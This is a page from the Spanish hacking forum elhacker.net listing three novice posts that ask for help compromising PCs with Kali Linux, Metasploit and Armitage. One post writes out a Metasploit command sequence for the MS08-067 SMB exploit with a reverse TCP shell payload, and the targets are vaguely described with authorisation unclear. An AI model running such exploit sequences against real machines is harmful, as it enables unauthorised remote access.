elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Hacking / Ayuda con kali linux en: 6 Febrero 2015, 03:56 am
Hola, me instale kali linux en virtual box (Ya que no quiero cambiar de sistema oparativo) y bueno estoy usando metasploit para hackear unas pc y bueno el exploit que uso es java_signed_applet y bueno me funciona pero nada mas en mi maquina virtual, mas no me funciona ni si quiera en mi red local, si por favor alguien me explica que sucede por favor, y ademas como uso NO-IP para montar lo que seria siendo la web, por favor ayuda  ;-) ;-)

Saludos!
2  Seguridad Informática / Hacking / ¿Alguien sabe usar Kali Linux? en: 4 Febrero 2015, 05:39 am
Hola, llevo un tiempo intentando penetrar un windows 7 pero no se como, he buscado tutoriales pero siempre me salen errores deiferentes :s, uso como hack armitage o de vez en cuando metasploit... Por favor ayuda soy nuevo en esto..
gracias por su tiempo  ;D ;D ;D
3  Seguridad Informática / Hacking / ¿Como puedo hackear una PC con Metasploit? en: 2 Febrero 2015, 03:22 am
Hola ultimamente e estado aprendiendo a hacer algunas cosas de Cracking pero ya me llama la atencion lo que seria siendo lo hacking, y decidi ir a aprender como hackear una PC vi unos tutoriales pero al final nada no funciono, les explico como lo hice, puse los siguientes comandos:
Cmd #1: use exploit/windows/smb/ms08_067_netapi
Cmd #2: set RHOST 000.000.000.000
Cmd #3: set payload windows/shell/reverse_tcp
Cmd #4: set LHOST 000.000.000.000
(Cmd #5): exploit

pero no me funciono, me sale unos errores pongo la ip y todo pero nada :s (Quiero dejar en claro que la pc que use para hackear es la de un amigo que es Linux/GNU) mi sistema operativo es Win 8.

Gracias por leer :D

 ;D ;D ;D ;D ;D ;D ;D ;D
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines